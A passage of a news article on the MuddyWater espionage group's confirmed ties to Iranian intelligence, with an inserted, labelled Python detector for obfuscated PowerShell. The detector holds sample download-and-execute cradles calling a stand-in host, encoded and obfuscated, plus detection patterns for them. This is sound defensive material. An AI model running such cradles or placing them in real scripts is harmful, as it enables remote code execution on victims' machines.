Yesterday, MuddyWater's ties to the Iranian intelligence establishment were officially confirmed by the United States Cyber Command (USCYBERCOM). The espionage group's numerous open-source tools and techniques for breaking into victim systems were also disclosed.
USCYBERCOM’s Cyber National Mission Force (CNMF) stated:
MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
The agency described the group as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), confirming previous reports about the threat actor's origins.
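The CNMF statement above names two of the group's habits, DLL side-loading and obfuscated PowerShell. The following is an added example, not code from the article or from any USCYBERCOM release, of how a defender can triage PowerShell command lines for the second of those: it decodes -EncodedCommand payloads, strips backtick and string-splitting obfuscation, and scores each line on co-occurring indicators. The command lines, the payload text and the example.invalid URLs are all constructed for this illustration and are not MuddyWater samples.

```python
import base64
import re

# Constructed sample: the plaintext a defender would expect to recover from an
# -EncodedCommand payload. The URL is a reserved example domain, not a real C2.
ENCODED_PAYLOAD_PLAINTEXT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
)
# PowerShell expects -EncodedCommand payloads as base64 over UTF-16LE text.
_ENCODED_PAYLOAD = base64.b64encode(
    ENCODED_PAYLOAD_PLAINTEXT.encode("utf-16le")
).decode("ascii")

# Constructed process command lines, in the shape a SIEM exports them.
# Written for this example; they are not captured MuddyWater samples.
SAMPLE_COMMAND_LINES = [
    # benign scheduled administration
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    # hidden window, execution-policy bypass, base64-encoded download cradle
    f"powershell.exe -w hidden -ep bypass -enc {_ENCODED_PAYLOAD}",
    # backtick and string-concatenation obfuscation hiding the same cradle
    "powershell.exe -c \"I`EX (Ne`w-Ob`ject Net.WebClient)"
    ".('Down'+'load'+'String')('http://example.invalid/b')\"",
]

INDICATOR_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest"
        r"|\biex\b|invoke-expression",
        re.I,
    ),
    "backtick_in_identifier": re.compile(r"\w`\w"),
    "string_concatenation": re.compile(r"'\s*\+\s*'"),
}


def _is_encoded_flag(token):
    """True for -EncodedCommand and the prefixes PowerShell accepts (-e, -en, -enc, ...)."""
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return name == "ec" or (len(name) >= 1 and "encodedcommand".startswith(name))


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand text, or None if the line has none."""
    tokens = cmd.split()
    for i, token in enumerate(tokens[:-1]):
        if _is_encoded_flag(token):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def normalize(cmd):
    """Undo two cheap obfuscations: backticks inside words and 'a'+'b' string splitting."""
    cmd = re.sub(r"(?<=\w)`(?=\w)", "", cmd)            # I`EX -> IEX
    previous = None
    while previous != cmd:                               # repeat until no 'x'+'y' pairs remain
        previous = cmd
        cmd = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", cmd)
    return cmd


def analyze(cmd):
    """Return the set of indicator names found in one command line."""
    hits = {name for name, pat in INDICATOR_PATTERNS.items() if pat.search(cmd)}
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.add("encoded_command")
    # Re-check for a download cradle after de-obfuscation and decoding, so that
    # splitting or encoding the cradle does not hide it from the raw-text scan.
    for text in (normalize(cmd), decoded or ""):
        if INDICATOR_PATTERNS["download_cradle"].search(text):
            hits.add("download_cradle")
    return hits


def is_suspicious(cmd):
    """Flag a line on an encoded command or on two or more co-occurring indicators."""
    hits = analyze(cmd)
    return "encoded_command" in hits or len(hits) >= 2


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        verdict = "SUSPICIOUS" if is_suspicious(line) else "ok"
        print(f"{verdict:10} {sorted(analyze(line))}")
        print(f"           {line[:90]}")
```

The scoring deliberately requires two indicators (or an encoded command) before flagging, because a single hit such as a hidden window or Net.WebClient is common in legitimate administration; in production the same logic would run over Sysmon event 1 or PowerShell script-block (event 4104) records rather than the constructed list.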
More on MuddyWater
The MuddyWater Advanced Persistent Threat (APT), also known as Static Kitten, Seedworm, Mercury, and TEMP.Zagros, is notorious for its attacks in the Middle East, primarily targeting governments, educational institutions, and cryptocurrency, telecommunications, and oil companies.
The group is thought to have been operational since at least 2017.
Recent attacks by the threat actor have included exploiting the ZeroLogon (CVE-2020-1472) flaw and leveraging remote desktop management tools such as ScreenConnect and Remote Utilities to deliver custom malware that could allow the attackers to obtain unauthorized access to confidential